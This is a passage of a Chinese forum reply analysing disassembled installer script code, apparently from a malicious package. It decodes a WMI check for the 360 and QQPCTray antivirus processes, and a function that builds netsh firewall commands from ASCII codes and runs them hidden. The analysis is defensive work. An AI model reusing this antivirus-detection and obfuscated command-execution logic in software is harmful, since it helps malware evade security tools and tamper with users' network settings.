- 移动版

回帖：_3 ; StackCount = 9assign Var9, String_3("ExecQuery")pushtype BOOLEAN ; StackCount = 10assign Var10, BOOLEAN(0)pushtype IDISPATCH ; StackCount = 11assign Var11, Var2pushvar Var3 ; StackCount = 12call IDISPATCHINVOKEpop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8pop ; StackCount = 7pushtype Variant ; StackCount = 8pushtype !OPENARRAYOFVARIANT ; StackCount = 9pushtype !OPENARRAYOFVARIANT ; StackCount = 10pushtype S32 ; StackCount = 11assign Var11, S32(0)pushvar Var10 ; StackCount = 12call SETARRAYLENGTHpop ; StackCount = 11pop ; StackCount = 10assign Var9, Var10pop ; StackCount = 9pushtype String_3 ; StackCount = 10assign Var10, String_3("Count")pushtype BOOLEAN ; StackCount = 11assign Var11, BOOLEAN(0)pushtype IDISPATCH ; StackCount = 12assign Var12, Var3pushvar Var8 ; StackCount = 13call IDISPATCHINVOKEpop ; StackCount = 12pop ; StackCount = 11pop ; StackCount = 10pop ; StackCount = 9pop ; StackCount = 8gt RetVal, Var8, S32(0)pop ; StackCount = 7endtryloc_8a1:assign RetVal, BOOLEAN(0)endcatchloc_8af:ret

这个函数包含多个ASCII码数组，用于构建字符串来检查360安全卫士进程是否在运行。

以下是所有数组的ASCII码还原结果及其对应的字符串：

第一个数组（26字节）ASCII码：87, 66, 69, 77, 83, 99, 114, 105, 112, 116, 105, 110, 103, 46, 83, 87, 66, 69, 77, 76, 111, 99, 97, 116, 111, 114字符串："WBEMScripting.SWBEMLocator"

第二个数组（11字节）ASCII码：51, 54, 48, 116, 114, 97, 121, 46, 101, 120, 101字符串："360tray.exe"

第三个数组（11字节）ASCII码：51, 54, 48, 84, 114, 97, 121, 46, 101, 120, 101字符串："360Tray.exe"

第四个数组（12字节）ASCII码：81, 81, 80, 67, 84, 114, 97, 121, 46, 101, 120, 101字符串："QQPCTray.exe"

该函数通过WMI查询系统进程，检查360安全卫士的进程是否在运行：创建WMI对象：创建WBEMScripting.SWBEMLocator对象连接WMI服务：连接到rootcimv2命名空间构建查询字符串：查询以下三个进程名之一是否存在：360tray.exe360Tray.exeQQPCTray.exe执行查询：通过WQL查询Win32_Process表检查结果：如果查询返回的进程计数大于0，则返回True，表示360进程在运行；否则返回False

最终构建的WQL查询语句为：SELECT * FROM Win32_Process WHERE Name="360tray.exe" OR Name="360Tray.exe" OR Name="QQPCTray.exe"

再来看"DISABLENETWORKADAPTERS"函数：复制代码隐藏代码.function(export) void DISABLENETWORKADAPTERS()pushtype S32 ; StackCount = 1pushtype BOOLEAN ; StackCount = 2pushtype Pointer ; StackCount = 3setptr Var3, Var1pushtype U8_4 ; StackCount = 4assign Var4, U8_4(1)pushtype S32 ; StackCount = 5assign Var5, S32(0)pushtype UnicodeString_2 ; StackCount = 6assign Var6, String_3("")pushtype UnicodeString_2 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(36)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], S32(97)assign Var9[1], S32(100)assign Var9[2], S32(118)assign Var9[3], S32(102)assign Var9[4], S32(105)assign Var9[5], S32(114)assign Var9[6], S32(101)assign Var9[7], S32(119)assign Var9[8], S32(97)assign Var9[9], S32(108)assign Var9[10], S32(108)assign Var9[11], S32(32)assign Var9[12], S32(115)assign Var9[13], S32(101)assign Var9[14], S32(116)assign Var9[15], S32(32)assign Var9[16], S32(97)assign Var9[17], S32(108)assign Var9[18], S32(108)assign Var9[19], S32(112)assign Var9[20], S32(114)assign Var9[21], S32(111)assign Var9[22], S32(102)assign Var9[23], S32(105)assign Var9[24], S32(108)assign Var9[25], S32(101)assign Var9[26], S32(115)assign Var9[27], S32(32)assign Var9[28], S32(115)assign Var9[29], S32(116)assign Var9[30], S32(97)assign Var9[31], S32(116)assign Var9[32], S32(101)assign Var9[33], S32(32)assign Var9[34], S32(111)assign Var9[35], S32(110)assign Var8, Var9pop ; StackCount = 8pushvar Var7 ; StackCount = 9call STRFROMCODEpop ; StackCount = 8pop ; StackCount = 7pushtype UnicodeString_2 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype Type30 ; StackCount = 10pushtype S32 ; StackCount = 11assign Var11, S32(5)pushvar Var10 ; StackCount = 12call SETARRAYLENGTHpop ; StackCount = 11pop ; StackCount = 10assign Var10[0], S32(110)assign Var10[1], S32(101)assign Var10[2], S32(116)assign Var10[3], S32(115)assign Var10[4], S32(104)assign Var9, Var10pop ; StackCount = 9pushvar Var8 ; StackCount = 10call STRFROMCODEpop ; StackCount = 9pop ; StackCount = 8pushvar Var2 ; StackCount = 9call EXECpop ; StackCount = 8pop ; StackCount = 7pop ; StackCount = 6pop ; StackCount = 5pop ; StackCount = 4pop ; StackCount = 3pop ; StackCount = 2pop ; StackCount = 1pushtype BOOLEAN ; StackCount = 2pushtype Pointer ; StackCount = 3setptr Var3, Var1pushtype U8_4 ; StackCount = 4assign Var4, U8_4(1)pushtype S32 ; StackCount = 5assign Var5, S32(0)pushtype UnicodeString_2 ; StackCount = 6assign Var6, String_3("")pushtype UnicodeString_2 ; StackCount = 7pushtype Type30 ; StackCount = 8pushtype Type30 ; StackCount = 9pushtype S32 ; StackCount = 10assign Var10, S32(69)pushvar Var9 ; StackCount = 11call SETARRAYLENGTHpop ; StackCount = 10pop ; StackCount = 9assign Var9[0], S32(97)assign Var9[1], S32(100)assign Var9[2], S32(118)assign Var9[3], S32(102)assign Var9[4], S32(105)assign Var9[5], S32(114)assign Var9[6], S32(101)assign Var9[7], S32(119)assign Var9[8], S32(97)assign Var9[9], S32(108)assign Var9[10], S32(108)assign Var9[11], S32(32)assign Var9[12], S32(115)assign Var9[13], S32(101)assign Var9[14], S32(116)assign Var9[15], S32(32)assign Var9[16], S32(97)assign Var9[17], S32(108)assign Var9[18], S32(108)assign Var9[19], S32(112)assign Var9[20], S32(114)assign Var9[21], S32(111)assign Var9[22], S32(102)assign Var9[23], S32(105)assign Var9[24], S32(108)assign Var9[25], S32(101)assign Var9[26], S32(115)assign Var9[27], S32(32)assign Var9[28], S32(102)assign Var9[29], S32(105)assign Var9[30], S32(114)assign Var9[31], S32(101)assign Var9[32], S32(119)assign Var9[33], S32(97)assign Var9[34

z3960回帖于2026-02-21 07:50

下一楼›：来看看看(huwg)

查看全部回帖(7)

«返回主帖